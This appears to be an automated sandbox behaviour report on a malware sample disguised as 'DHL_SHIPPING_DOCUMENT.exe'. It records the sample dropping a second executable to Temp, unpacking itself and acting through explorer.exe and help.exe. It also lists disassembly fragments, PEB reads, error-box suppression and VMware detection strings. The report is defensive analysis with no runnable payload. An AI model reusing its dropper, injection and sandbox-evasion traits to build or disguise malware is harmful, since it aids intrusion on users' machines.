          Source: Binary string: wntdll.pdbUGP source: eixfhzlwqd.exe, 00000001.00000003.319488467.000000001A150000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000001.00000003.314926280.0000000019FC0000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: eixfhzlwqd.exe, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: help.pdb source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeUnpacked PE file: 3.2.eixfhzlwqd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_00410AA4 push ecx; ret 1_2_00410AB7
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00410928 push ebx; retf 3_2_00410955
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00410933 push ebx; retf 3_2_00410955
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041EA5C push ecx; retf 3_2_0041EA5E
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041AA67 push ebx; retf 3_2_0041AA6C
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0040DB29 pushad ; retf 3_2_0040DB2A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041B4E4 push edi; iretd 3_2_0041B4EA
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00410CFB push esi; ret 3_2_00410D04
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00401DA0 push eax; ret 3_2_00401DA2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041A6D0 push cs; iretd 3_2_0041A6CF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041A6AC push cs; iretd 3_2_0041A6CF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0040A706 push ds; retf 3_2_0040A707
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0040CF3E push ebp; iretd 3_2_0040CF3F
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0040D7FC push eax; iretd 3_2_0040D7FD
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041B79D push esi; ret 3_2_0041B79E
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A7D0D1 push ecx; ret 3_2_00A7D0E4
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeFile created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 3736Thread sleep time: -52000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A56A60 rdtscp 3_2_00A56A60
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeAPI coverage: 9.3 %
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_004089F8 FindFirstFileExW,1_2_004089F8
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000004.00000003.451856670.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.451856670.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000000.329318562.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.333026756.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.448362246.000000000CDE5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000004.00000003.573202174.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447763601.000000000CFFD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446800528.000000000CFC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551908862.000000000D009000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
          Source: explorer.exe, 00000004.00000003.451856670.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040636B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_0040B0AF GetProcessHeap,1_2_0040B0AF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A56A60 rdtscp 3_2_00A56A60
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A690AF mov eax, dword ptr fs:[00000030h]3_2_00A690AF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]3_2_00A5F0BF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]3_2_00A5F0BF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]3_2_00A5F0BF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29080 mov eax, dword ptr fs:[00000030h]3_2_00A29080
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]3_2_00AA3884
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]3_2_00AA3884
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A258EC mov eax, dword ptr fs:[00000030h]3_2_00A258EC
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]3_2_00AF4015
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]3_2_00AF4015
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]3_2_00AA7016
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]3_2_00AA7016
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]3_2_00AA7016
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF1074 mov eax, dword ptr fs:[00000030h]3_2_00AF1074
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE2073 mov eax, dword ptr fs:[00000030h]3_2_00AE2073
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]3_2_00A40050
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]3_2_00A40050
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]3_2_00A561A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]3_2_00A561A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA69A6 mov eax, dword ptr fs:[00000030h]3_2_00AA69A6
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5A185 mov eax, dword ptr fs:[00000030h]3_2_00A5A185
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4C182 mov eax, dword ptr fs:[00000030h]3_2_00A4C182
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52990 mov eax, dword ptr fs:[00000030h]3_2_00A52990
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A2B1E1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A2B1E1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A2B1E1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AB41E8 mov eax, dword ptr fs:[00000030h]3_2_00AB41E8
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A44120 mov ecx, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]3_2_00A5513A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]3_2_00A5513A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]3_2_00A29100
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]3_2_00A29100
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]3_2_00A29100
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2C962 mov eax, dword ptr fs:[00000030h]3_2_00A2C962
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]3_2_00A2B171
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]3_2_00A2B171
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]3_2_00A4B944
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]3_2_00A4B944
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A3AAB0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A3AAB0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]3_2_00A5FAB0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]3_2_00A5D294
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]3_2_00A5D294
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52AE4 mov eax, dword ptr fs:[00000030h]3_2_00A52AE4
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52ACB mov eax, dword ptr fs:[00000030h]3_2_00A52ACB
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]3_2_00A64A2C
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]3_2_00A64A2C
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A38A0A mov eax, dword ptr fs:[00000030h]3_2_00A38A0A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A25210 mov ecx, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]3_2_00A2AA16
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]3_2_00A2AA16
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A43A1C mov eax, dword ptr fs:[00000030h]3_2_00A43A1C
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]3_2_00ADB260
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]3_2_00ADB260
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF8A62 mov eax, dword ptr fs:[00000030h]3_2_00AF8A62
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A6927A mov eax, dword ptr fs:[00000030h]3_2_00A6927A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEEA55 mov eax, dword ptr fs:[00000030h]3_2_00AEEA55
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AB4257 mov eax, dword ptr fs:[00000030h]3_2_00AB4257
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]3_2_00A54BAD
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]3_2_00A54BAD
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]3_2_00A54BAD
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]3_2_00AF5BA5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE138A mov eax, dword ptr fs:[00000030h]3_2_00AE138A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]3_2_00A31B8F
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]3_2_00A31B8F
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00ADD380 mov ecx, dword ptr fs:[00000030h]3_2_00ADD380
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A52397 mov eax, dword ptr fs:[00000030h]3_2_00A52397
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5B390 mov eax, dword ptr fs:[00000030h]3_2_00A5B390
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]3_2_00A4DBE9
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]3_2_00AA53CA
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]3_2_00AA53CA
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE131B mov eax, dword ptr fs:[00000030h]3_2_00AE131B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]3_2_00A2DB60
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]3_2_00A53B7A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]3_2_00A53B7A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2DB40 mov eax, dword ptr fs:[00000030h]3_2_00A2DB40
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF8B58 mov eax, dword ptr fs:[00000030h]3_2_00AF8B58
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2F358 mov eax, dword ptr fs:[00000030h]3_2_00A2F358
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3849B mov eax, dword ptr fs:[00000030h]3_2_00A3849B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE14FB mov eax, dword ptr fs:[00000030h]3_2_00AE14FB
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_00AA6CF0
